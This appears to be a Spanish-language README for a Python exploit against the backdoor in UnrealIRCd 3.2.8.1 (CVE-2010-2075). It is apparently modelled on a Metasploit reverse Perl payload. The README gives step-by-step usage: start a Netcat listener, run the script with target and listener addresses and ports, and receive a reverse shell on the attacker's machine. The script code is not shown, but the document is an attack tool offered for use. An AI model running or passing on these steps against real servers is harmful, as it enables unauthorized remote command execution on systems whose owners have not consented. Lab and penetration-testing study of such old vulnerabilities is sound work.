
Exploit en Python para la puerta trasera de UnrealIRCd 3.2.8.1 (CVE-2010-2075) que entrega una reverse shell a través de un listener de Netcat.
Exploit de backdoor en UnrealIRCd 3.2.8.1 para ejecución de comandos en Python 3 (CVE-2010-2075).
La versión 3.2.8.1 de UnrealIRCd contiene un caballo de Troya que permite a atacantes remotos ejecutar comandos arbitrarios (CVE-2010-2075).
Hice referencia al payload de Metasploit payload/cmd/unix/reverse_perl para crear este script.
Inicia un listener de Netcat en el host de escucha:
nc -lp 4444
Ejecuta el script proporcionando los siguientes argumentos posicionales:
python3 script.py <target> <tport> <listener> <lport>
<target> Dirección IP del host objetivo.<tport> Número de puerto del host objetivo.<listener> Dirección IP del host de escucha.<lport> Número de puerto del host de escucha.Configura un listener de Netcat en tu máquina local:
nc -lp 4444
Ejecuta el script contra una máquina objetivo en 192.168.1.3 puerto TCP 6697:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
Espera un minuto y el listener de Netcat debería recibir una shell inversa.